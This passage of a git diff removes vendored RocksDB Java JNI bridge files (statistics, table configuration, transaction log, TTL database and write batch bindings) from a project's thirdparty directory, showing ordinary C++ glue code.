- * Signature: (JB)J
- */
-jlong Java_org_rocksdb_Statistics_getAndResetTickerCount(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jticker_type) {
-  auto* pSptr_statistics =
-      reinterpret_cast<std::shared_ptr<rocksdb::Statistics>*>(jhandle);
-  assert(pSptr_statistics != nullptr);
-  auto ticker = rocksdb::TickerTypeJni::toCppTickers(jticker_type);
-  return pSptr_statistics->get()->getAndResetTickerCount(ticker);
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    getHistogramData
- * Signature: (JB)Lorg/rocksdb/HistogramData;
- */
-jobject Java_org_rocksdb_Statistics_getHistogramData(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jhistogram_type) {
-  auto* pSptr_statistics =
-      reinterpret_cast<std::shared_ptr<rocksdb::Statistics>*>(jhandle);
-  assert(pSptr_statistics != nullptr);
-
-  rocksdb::HistogramData data;  // TODO(AR) perhaps better to construct a Java Object Wrapper that uses ptr to C++ `new HistogramData`
-  auto histogram = rocksdb::HistogramTypeJni::toCppHistograms(jhistogram_type);
-  pSptr_statistics->get()->histogramData(
-      static_cast<rocksdb::Histograms>(histogram), &data);
-
-  jclass jclazz = rocksdb::HistogramDataJni::getJClass(env);
-  if(jclazz == nullptr) {
-    // exception occurred accessing class
-    return nullptr;
-  }
-
-  jmethodID mid = rocksdb::HistogramDataJni::getConstructorMethodId(
-      env);
-  if(mid == nullptr) {
-    // exception occurred accessing method
-    return nullptr;
-  }
-
-  return env->NewObject(
-      jclazz,
-      mid, data.median, data.percentile95,data.percentile99, data.average,
-      data.standard_deviation);
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    getHistogramString
- * Signature: (JB)Ljava/lang/String;
- */
-jstring Java_org_rocksdb_Statistics_getHistogramString(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jhistogram_type) {
-  auto* pSptr_statistics =
-      reinterpret_cast<std::shared_ptr<rocksdb::Statistics>*>(jhandle);
-  assert(pSptr_statistics != nullptr);
-  auto histogram = rocksdb::HistogramTypeJni::toCppHistograms(jhistogram_type);
-  auto str = pSptr_statistics->get()->getHistogramString(histogram);
-  return env->NewStringUTF(str.c_str());
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    reset
- * Signature: (J)V
- */
-void Java_org_rocksdb_Statistics_reset(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-   auto* pSptr_statistics =
-      reinterpret_cast<std::shared_ptr<rocksdb::Statistics>*>(jhandle);
-  assert(pSptr_statistics != nullptr);
-  rocksdb::Status s = pSptr_statistics->get()->Reset();
-  if (!s.ok()) {
-   rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    toString
- * Signature: (J)Ljava/lang/String;
- */
-jstring Java_org_rocksdb_Statistics_toString(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-   auto* pSptr_statistics =
-      reinterpret_cast<std::shared_ptr<rocksdb::Statistics>*>(jhandle);
-  assert(pSptr_statistics != nullptr);
-  auto str = pSptr_statistics->get()->ToString();
-  return env->NewStringUTF(str.c_str());
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/statisticsjni.cc b/thirdparty/rocksdb/java/rocksjni/statisticsjni.cc
deleted file mode 100644
index 584ab5a..0000000
--- a/thirdparty/rocksdb/java/rocksjni/statisticsjni.cc
+++ /dev/null
@@ -1,33 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the callback "bridge" between Java and C++ for
-// rocksdb::Statistics
-
-#include "rocksjni/statisticsjni.h"
-
-namespace rocksdb {
-
-  StatisticsJni::StatisticsJni(std::shared_ptr<Statistics> stats)
-      : StatisticsImpl(stats, false), m_ignore_histograms() {
-  }
-
-  StatisticsJni::StatisticsJni(std::shared_ptr<Statistics> stats,
-      const std::set<uint32_t> ignore_histograms) : StatisticsImpl(stats, false),
-      m_ignore_histograms(ignore_histograms) {
-  }
-
-  bool StatisticsJni::HistEnabledForType(uint32_t type) const {
-    if (type >= HISTOGRAM_ENUM_MAX) {
-      return false;
-    }
-    
-    if (m_ignore_histograms.count(type) > 0) {
-        return false;
-    }
-
-    return true;
-  }
-};
\ No newline at end of file
diff --git a/thirdparty/rocksdb/java/rocksjni/statisticsjni.h b/thirdparty/rocksdb/java/rocksjni/statisticsjni.h
deleted file mode 100644
index 600d9a6..0000000
--- a/thirdparty/rocksdb/java/rocksjni/statisticsjni.h
+++ /dev/null
@@ -1,33 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the callback "bridge" between Java and C++ for
-// rocksdb::Statistics
-
-#ifndef JAVA_ROCKSJNI_STATISTICSJNI_H_
-#define JAVA_ROCKSJNI_STATISTICSJNI_H_
-
-#include <memory>
-#include <set>
-#include <string>
-#include "rocksdb/statistics.h"
-#include "monitoring/statistics.h"
-
-namespace rocksdb {
-
-  class StatisticsJni : public StatisticsImpl {
-   public:
-     StatisticsJni(std::shared_ptr<Statistics> stats);
-     StatisticsJni(std::shared_ptr<Statistics> stats,
-         const std::set<uint32_t> ignore_histograms);
-     virtual bool HistEnabledForType(uint32_t type) const override;
-
-   private:
-     const std::set<uint32_t> m_ignore_histograms;
- };
-
-}  // namespace rocksdb
-
-#endif  // JAVA_ROCKSJNI_STATISTICSJNI_H_
\ No newline at end of file
diff --git a/thirdparty/rocksdb/java/rocksjni/table.cc b/thirdparty/rocksdb/java/rocksjni/table.cc
deleted file mode 100644
index 5f0a473..0000000
--- a/thirdparty/rocksdb/java/rocksjni/table.cc
+++ /dev/null
@@ -1,92 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for rocksdb::Options.
-
-#include <jni.h>
-#include "include/org_rocksdb_PlainTableConfig.h"
-#include "include/org_rocksdb_BlockBasedTableConfig.h"
-#include "rocksdb/table.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/filter_policy.h"
-
-/*
- * Class:     org_rocksdb_PlainTableConfig
- * Method:    newTableFactoryHandle
- * Signature: (IIDIIBZZ)J
- */
-jlong Java_org_rocksdb_PlainTableConfig_newTableFactoryHandle(
-    JNIEnv* env, jobject jobj, jint jkey_size, jint jbloom_bits_per_key,
-    jdouble jhash_table_ratio, jint jindex_sparseness,
-    jint jhuge_page_tlb_size, jbyte jencoding_type,
-    jboolean jfull_scan_mode, jboolean jstore_index_in_file) {
-  rocksdb::PlainTableOptions options = rocksdb::PlainTableOptions();
-  options.user_key_len = jkey_size;
-  options.bloom_bits_per_key = jbloom_bits_per_key;
-  options.hash_table_ratio = jhash_table_ratio;
-  options.index_sparseness = jindex_sparseness;
-  options.huge_page_tlb_size = jhuge_page_tlb_size;
-  options.encoding_type = static_cast<rocksdb::EncodingType>(
-      jencoding_type);
-  options.full_scan_mode = jfull_scan_mode;
-  options.store_index_in_file = jstore_index_in_file;
-  return reinterpret_cast<jlong>(rocksdb::NewPlainTableFactory(options));
-}
-
-/*
- * Class:     org_rocksdb_BlockBasedTableConfig
- * Method:    newTableFactoryHandle
- * Signature: (ZJIJIIZIZZZJIBBI)J
- */
-jlong Java_org_rocksdb_BlockBasedTableConfig_newTableFactoryHandle(
-    JNIEnv* env, jobject jobj, jboolean no_block_cache, jlong block_cache_size,
-    jint block_cache_num_shardbits, jlong block_size, jint block_size_deviation,
-    jint block_restart_interval, jboolean whole_key_filtering,
-    jlong jfilterPolicy, jboolean cache_index_and_filter_blocks,
-    jboolean pin_l0_filter_and_index_blocks_in_cache,
-    jboolean hash_index_allow_collision, jlong block_cache_compressed_size,
-    jint block_cache_compressd_num_shard_bits, jbyte jchecksum_type,
-    jbyte jindex_type, jint jformat_version) {
-  rocksdb::BlockBasedTableOptions options;
-  options.no_block_cache = no_block_cache;
-
-  if (!no_block_cache && block_cache_size > 0) {
-    if (block_cache_num_shardbits > 0) {
-      options.block_cache =
-          rocksdb::NewLRUCache(block_cache_size, block_cache_num_shardbits);
-    } else {
-      options.block_cache = rocksdb::NewLRUCache(block_cache_size);
-    }
-  }
-  options.block_size = block_size;
-  options.block_size_deviation = block_size_deviation;
-  options.block_restart_interval = block_restart_interval;
-  options.whole_key_filtering = whole_key_filtering;
-  if (jfilterPolicy > 0) {
-    std::shared_ptr<rocksdb::FilterPolicy> *pFilterPolicy =
-        reinterpret_cast<std::shared_ptr<rocksdb::FilterPolicy> *>(
-            jfilterPolicy);
-    options.filter_policy = *pFilterPolicy;
-  }
-  options.cache_index_and_filter_blocks = cache_index_and_filter_blocks;
-  options.pin_l0_filter_and_index_blocks_in_cache =
-      pin_l0_filter_and_index_blocks_in_cache;
-  options.hash_index_allow_collision = hash_index_allow_collision;
-  if (block_cache_compressed_size > 0) {
-    if (block_cache_compressd_num_shard_bits > 0) {
-      options.block_cache =
-          rocksdb::NewLRUCache(block_cache_compressed_size,
-              block_cache_compressd_num_shard_bits);
-    } else {
-      options.block_cache = rocksdb::NewLRUCache(block_cache_compressed_size);
-    }
-  }
-  options.checksum = static_cast<rocksdb::ChecksumType>(jchecksum_type);
-  options.index_type = static_cast<
-      rocksdb::BlockBasedTableOptions::IndexType>(jindex_type);
-  options.format_version = jformat_version;
-
-  return reinterpret_cast<jlong>(rocksdb::NewBlockBasedTableFactory(options));
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/transaction_log.cc b/thirdparty/rocksdb/java/rocksjni/transaction_log.cc
deleted file mode 100644
index a5049e3..0000000
--- a/thirdparty/rocksdb/java/rocksjni/transaction_log.cc
+++ /dev/null
@@ -1,71 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::Iterator methods from Java side.
-
-#include <jni.h>
-#include <stdio.h>
-#include <stdlib.h>
-
-#include "include/org_rocksdb_TransactionLogIterator.h"
-#include "rocksdb/transaction_log.h"
-#include "rocksjni/portal.h"
-
-/*
- * Class:     org_rocksdb_TransactionLogIterator
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_TransactionLogIterator_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  delete reinterpret_cast<rocksdb::TransactionLogIterator*>(handle);
-}
-
-/*
- * Class:     org_rocksdb_TransactionLogIterator
- * Method:    isValid
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_TransactionLogIterator_isValid(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  return reinterpret_cast<rocksdb::TransactionLogIterator*>(handle)->Valid();
-}
-
-/*
- * Class:     org_rocksdb_TransactionLogIterator
- * Method:    next
- * Signature: (J)V
- */
-void Java_org_rocksdb_TransactionLogIterator_next(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  reinterpret_cast<rocksdb::TransactionLogIterator*>(handle)->Next();
-}
-
-/*
- * Class:     org_rocksdb_TransactionLogIterator
- * Method:    status
- * Signature: (J)V
- */
-void Java_org_rocksdb_TransactionLogIterator_status(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  rocksdb::Status s = reinterpret_cast<
-      rocksdb::TransactionLogIterator*>(handle)->status();
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_TransactionLogIterator
- * Method:    getBatch
- * Signature: (J)Lorg/rocksdb/TransactionLogIterator$BatchResult
- */
-jobject Java_org_rocksdb_TransactionLogIterator_getBatch(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  rocksdb::BatchResult batch_result =
-      reinterpret_cast<rocksdb::TransactionLogIterator*>(handle)->GetBatch();
-  return rocksdb::BatchResultJni::construct(env, batch_result);
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/ttl.cc b/thirdparty/rocksdb/java/rocksjni/ttl.cc
deleted file mode 100644
index a66ad86..0000000
--- a/thirdparty/rocksdb/java/rocksjni/ttl.cc
+++ /dev/null
@@ -1,183 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::TtlDB methods.
-// from Java side.
-
-#include <jni.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string>
-#include <vector>
-#include <memory>
-
-#include "include/org_rocksdb_TtlDB.h"
-#include "rocksdb/utilities/db_ttl.h"
-#include "rocksjni/portal.h"
-
-/*
- * Class:     org_rocksdb_TtlDB
- * Method:    open
- * Signature: (JLjava/lang/String;IZ)J
- */
-jlong Java_org_rocksdb_TtlDB_open(JNIEnv* env,
-    jclass jcls, jlong joptions_handle, jstring jdb_path,
-    jint jttl, jboolean jread_only) {
-  const char* db_path = env->GetStringUTFChars(jdb_path, nullptr);
-  if(db_path == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return 0;
-  }
-
-  auto* opt = reinterpret_cast<rocksdb::Options*>(joptions_handle);
-  rocksdb::DBWithTTL* db = nullptr;
-  rocksdb::Status s = rocksdb::DBWithTTL::Open(*opt, db_path, &db,
-      jttl, jread_only);
-  env->ReleaseStringUTFChars(jdb_path, db_path);
-
-  // as TTLDB extends RocksDB on the java side, we can reuse
-  // the RocksDB portal here.
-  if (s.ok()) {
-    return reinterpret_cast<jlong>(db);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-    return 0;
-  }
-}
-
-/*
- * Class:     org_rocksdb_TtlDB
- * Method:    openCF
- * Signature: (JLjava/lang/String;[[B[J[IZ)[J
- */
-jlongArray
-    Java_org_rocksdb_TtlDB_openCF(
-    JNIEnv* env, jclass jcls, jlong jopt_handle, jstring jdb_path,
-    jobjectArray jcolumn_names, jlongArray jcolumn_options,
-    jintArray jttls, jboolean jread_only) {
-  const char* db_path = env->GetStringUTFChars(jdb_path, nullptr);
-  if(db_path == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return 0;
-  }
-
-  const jsize len_cols = env->GetArrayLength(jcolumn_names);
-  jlong* jco = env->GetLongArrayElements(jcolumn_options, nullptr);
-  if(jco == nullptr) {
-    // exception thrown: OutOfMemoryError
-    env->ReleaseStringUTFChars(jdb_path, db_path);
-    return nullptr;
-  }
-
-  std::vector<rocksdb::ColumnFamilyDescriptor> column_families;
-  jboolean has_exception = JNI_FALSE;
-  rocksdb::JniUtil::byteStrings<std::string>(
-    env,
-    jcolumn_names,
-    [](const char* str_data, const size_t str_len) {
-      return std::string(str_data, str_len);
-    },
-    [&jco, &column_families](size_t idx, std::string cf_name) {
-      rocksdb::ColumnFamilyOptions* cf_options =
-          reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jco[idx]);
-      column_families.push_back(
-          rocksdb::ColumnFamilyDescriptor(cf_name, *cf_options));
-    },
-    &has_exception);
-
-  env->ReleaseLongArrayElements(jcolumn_options, jco, JNI_ABORT);
-
-  if(has_exception == JNI_TRUE) {
-    // exception occurred
-    env->ReleaseStringUTFChars(jdb_path, db_path);
-    return nullptr;
-  }
-
-  std::vector<int32_t> ttl_values;
-  jint* jttlv = env->GetIntArrayElements(jttls, nullptr);
-  if(jttlv == nullptr) {
-    // exception thrown: OutOfMemoryError
-    env->ReleaseStringUTFChars(jdb_path, db_path);
-    return nullptr;
-  }
-  const jsize len_ttls = env->GetArrayLength(jttls);
-  for(jsize i = 0; i < len_ttls; i++) {
-    ttl_values.push_back(jttlv[i]);
-  }
-  env->ReleaseIntArrayElements(jttls, jttlv, JNI_ABORT);
-
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jopt_handle);
-  std::vector<rocksdb::ColumnFamilyHandle*> handles;
-  rocksdb::DBWithTTL* db = nullptr;
-  rocksdb::Status s = rocksdb::DBWithTTL::Open(*opt, db_path, column_families,
-      &handles, &db, ttl_values, jread_only);
-
-  // we have now finished with db_path
-  env->ReleaseStringUTFChars(jdb_path, db_path);
-
-  // check if open operation was successful
-  if (s.ok()) {
-    const jsize resultsLen = 1 + len_cols; //db handle + column family handles
-    std::unique_ptr<jlong[]> results =
-        std::unique_ptr<jlong[]>(new jlong[resultsLen]);
-    results[0] = reinterpret_cast<jlong>(db);
-    for(int i = 1; i <= len_cols; i++) {
-      results[i] = reinterpret_cast<jlong>(handles[i - 1]);
-    }
-
-    jlongArray jresults = env->NewLongArray(resultsLen);
-    if(jresults == nullptr) {
-      // exception thrown: OutOfMemoryError
-      return nullptr;
-    }
-
-    env->SetLongArrayRegion(jresults, 0, resultsLen, results.get());
-    if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      env->DeleteLocalRef(jresults);
-      return nullptr;
-    }
-
-    return jresults;
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-    return NULL;
-  }
-}
-
-/*
- * Class:     org_rocksdb_TtlDB
- * Method:    createColumnFamilyWithTtl
- * Signature: (JLorg/rocksdb/ColumnFamilyDescriptor;[BJI)J;
- */
-jlong Java_org_rocksdb_TtlDB_createColumnFamilyWithTtl(
-    JNIEnv* env, jobject jobj, jlong jdb_handle,
-    jbyteArray jcolumn_name, jlong jcolumn_options, jint jttl) {
-
-  jbyte* cfname = env->GetByteArrayElements(jcolumn_name, nullptr);
-  if(cfname == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return 0;
-  }
-  const jsize len = env->GetArrayLength(jcolumn_name);
-
-  auto* cfOptions =
-      reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jcolumn_options);
-
-  auto* db_handle = reinterpret_cast<rocksdb::DBWithTTL*>(jdb_handle);
-  rocksdb::ColumnFamilyHandle* handle;
-  rocksdb::Status s = db_handle->CreateColumnFamilyWithTtl(
-      *cfOptions, std::string(reinterpret_cast<char *>(cfname),
-          len), &handle, jttl);
-
-  env->ReleaseByteArrayElements(jcolumn_name, cfname, 0);
-
-  if (s.ok()) {
-    return reinterpret_cast<jlong>(handle);
-  }
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  return 0;
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/write_batch.cc b/thirdparty/rocksdb/java/rocksjni/write_batch.cc
deleted file mode 100644
index e84f6ed..0000000
--- a/thirdparty/rocksdb/java/rocksjni/write_batch.cc
+++ /dev/null
@@ -1,313 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::WriteBatch methods from Java side.
-#include <memory>
-
-#include "db/memtable.h"
-#include "db/write_batch_internal.h"
-#include "include/org_rocksdb_WriteBatch.h"
-#include "include/org_rocksdb_WriteBatch_Handler.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/status.h"
-#include "rocksdb/write_batch.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "rocksjni/portal.h"
-#include "rocksjni/writebatchhandlerjnicallback.h"
-#include "table/scoped_arena_iterator.h"
-#include "util/logging.h"
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    newWriteBatch
- * Signature: (I)J
- */
-jlong Java_org_rocksdb_WriteBatch_newWriteBatch(
-    JNIEnv* env, jclass jcls, jint jreserved_bytes) {
-  auto* wb = new rocksdb::WriteBatch(static_cast<size_t>(jreserved_bytes));
-  return reinterpret_cast<jlong>(wb);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    count0
- * Signature: (J)I
- */
-jint Java_org_rocksdb_WriteBatch_count0(JNIEnv* env, jobject jobj,
-    jlong jwb_handle) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-
-  return static_cast<jint>(wb->Count());
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    clear0
- * Signature: (J)V
- */
-void Java_org_rocksdb_WriteBatch_clear0(JNIEnv* env, jobject jobj,
-    jlong jwb_handle) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-
-  wb->Clear();
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    setSavePoint0
- * Signature: (J)V
- */
-void Java_org_rocksdb_WriteBatch_setSavePoint0(
-    JNIEnv* env, jobject jobj, jlong jwb_handle) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-
-  wb->SetSavePoint();
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    rollbackToSavePoint0
- * Signature: (J)V
- */
-void Java_org_rocksdb_WriteBatch_rollbackToSavePoint0(
-    JNIEnv* env, jobject jobj, jlong jwb_handle) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-
-  auto s = wb->RollbackToSavePoint();
-
-  if (s.ok()) {
-    return;
-  }
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    put
- * Signature: (J[BI[BI)V
- */
-void Java_org_rocksdb_WriteBatch_put__J_3BI_3BI(
-    JNIEnv* env, jobject jobj, jlong jwb_handle,
-    jbyteArray jkey, jint jkey_len,
-    jbyteArray jentry_value, jint jentry_value_len) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-  auto put = [&wb] (rocksdb::Slice key, rocksdb::Slice value) {
-    wb->Put(key, value);
-  };
-  rocksdb::JniUtil::kv_op(put, env, jobj, jkey, jkey_len, jentry_value,
-      jentry_value_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    put
- * Signature: (J[BI[BIJ)V
- */
-void Java_org_rocksdb_WriteBatch_put__J_3BI_3BIJ(
-    JNIEnv* env, jobject jobj, jlong jwb_handle,
-    jbyteArray jkey, jint jkey_len,
-    jbyteArray jentry_value, jint jentry_value_len, jlong jcf_handle) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  assert(cf_handle != nullptr);
-  auto put = [&wb, &cf_handle] (rocksdb::Slice key, rocksdb::Slice value) {
-    wb->Put(cf_handle, key, value);
-  };
-  rocksdb::JniUtil::kv_op(put, env, jobj, jkey, jkey_len, jentry_value,
-      jentry_value_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    merge
- * Signature: (J[BI[BI)V
- */
-void Java_org_rocksdb_WriteBatch_merge__J_3BI_3BI(
-    JNIEnv* env, jobject jobj, jlong jwb_handle,
-    jbyteArray jkey, jint jkey_len,
-    jbyteArray jentry_value, jint jentry_value_len) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-  auto merge = [&wb] (rocksdb::Slice key, rocksdb::Slice value) {
-    wb->Merge(key, value);
-  };
-  rocksdb::JniUtil::kv_op(merge, env, jobj, jkey, jkey_len, jentry_value,
-      jentry_value_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    merge
- * Signature: (J[BI[BIJ)V
- */
-void Java_org_rocksdb_WriteBatch_merge__J_3BI_3BIJ(
-    JNIEnv* env, jobject jobj, jlong jwb_handle,
-    jbyteArray jkey, jint jkey_len,
-    jbyteArray jentry_value, jint jentry_value_len, jlong jcf_handle) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  assert(cf_handle != nullptr);
-  auto merge = [&wb, &cf_handle] (rocksdb::Slice key, rocksdb::Slice value) {
-    wb->Merge(cf_handle, key, value);
-  };
-  rocksdb::JniUtil::kv_op(merge, env, jobj, jkey, jkey_len, jentry_value,
-      jentry_value_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    remove
- * Signature: (J[BI)V
- */
-void Java_org_rocksdb_WriteBatch_remove__J_3BI(
-    JNIEnv* env, jobject jobj, jlong jwb_handle,
-    jbyteArray jkey, jint jkey_len) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-  auto remove = [&wb] (rocksdb::Slice key) {
-    wb->Delete(key);
-  };
-  rocksdb::JniUtil::k_op(remove, env, jobj, jkey, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    remove
- * Signature: (J[BIJ)V
- */
-void Java_org_rocksdb_WriteBatch_remove__J_3BIJ(
-    JNIEnv* env, jobject jobj, jlong jwb_handle,
-    jbyteArray jkey, jint jkey_len, jlong jcf_handle) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  assert(cf_handle != nullptr);
-  auto remove = [&wb, &cf_handle] (rocksdb::Slice key) {
-    wb->Delete(cf_handle, key);
-  };
-  rocksdb::JniUtil::k_op(remove, env, jobj, jkey, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    deleteRange
- * Signature: (J[BI[BI)V
- */
-JNIEXPORT void JNICALL Java_org_rocksdb_WriteBatch_deleteRange__J_3BI_3BI(
-    JNIEnv*, jobject, jlong, jbyteArray, jint, jbyteArray, jint);
-
-void Java_org_rocksdb_WriteBatch_deleteRange__J_3BI_3BI(
-    JNIEnv* env, jobject jobj, jlong jwb_handle, jbyteArray jbegin_key,
-    jint jbegin_key_len, jbyteArray jend_key, jint jend_key_len) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-  auto deleteRange = [&wb](rocksdb::Slice beginKey, rocksdb::Slice endKey) {
-    wb->DeleteRange(beginKey, endKey);
-  };
-  rocksdb::JniUtil::kv_op(deleteRange, env, jobj, jbegin_key, jbegin_key_len,
-                          jend_key, jend_key_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    deleteRange
- * Signature: (J[BI[BIJ)V
- */
-void Java_org_rocksdb_WriteBatch_deleteRange__J_3BI_3BIJ(
-    JNIEnv* env, jobject jobj, jlong jwb_handle, jbyteArray jbegin_key,
-    jint jbegin_key_len, jbyteArray jend_key, jint jend_key_len,
-    jlong jcf_handle) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  assert(cf_handle != nullptr);
-  auto deleteRange = [&wb, &cf_handle](rocksdb::Slice beginKey,
-                                       rocksdb::Slice endKey) {
-    wb->DeleteRange(cf_handle, beginKey, endKey);
-  };
-  rocksdb::JniUtil::kv_op(deleteRange, env, jobj, jbegin_key, jbegin_key_len,
-                          jend_key, jend_key_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    putLogData
- * Signature: (J[BI)V
- */
-void Java_org_rocksdb_WriteBatch_putLogData(
-    JNIEnv* env, jobject jobj, jlong jwb_handle, jbyteArray jblob,
-    jint jblob_len) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-  auto putLogData = [&wb] (rocksdb::Slice blob) {
-    wb->PutLogData(blob);
-  };
-  rocksdb::JniUtil::k_op(putLogData, env, jobj, jblob, jblob_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    iterate
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_WriteBatch_iterate(
-    JNIEnv* env , jobject jobj, jlong jwb_handle, jlong handlerHandle) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-
-  rocksdb::Status s = wb->Iterate(
-    reinterpret_cast<rocksdb::WriteBatchHandlerJniCallback*>(handlerHandle));
-
-  if (s.ok()) {
-    return;
-  }
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_WriteBatch_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(handle);
-  assert(wb != nullptr);
-  delete wb;
-}
-
-/*
- * Class:     org_rocksdb_WriteBatch_Handler
- * Method:    createNewHandler0
- * Signature: ()J
- */
-jlong Java_org_rocksdb_WriteBatch_00024Handler_createNewHandler0(
-    JNIEnv* env, jobject jobj) {
-  auto* wbjnic = new rocksdb::WriteBatchHandlerJniCallback(env, jobj);
-  return reinterpret_cast<jlong>(wbjnic);
-}
-
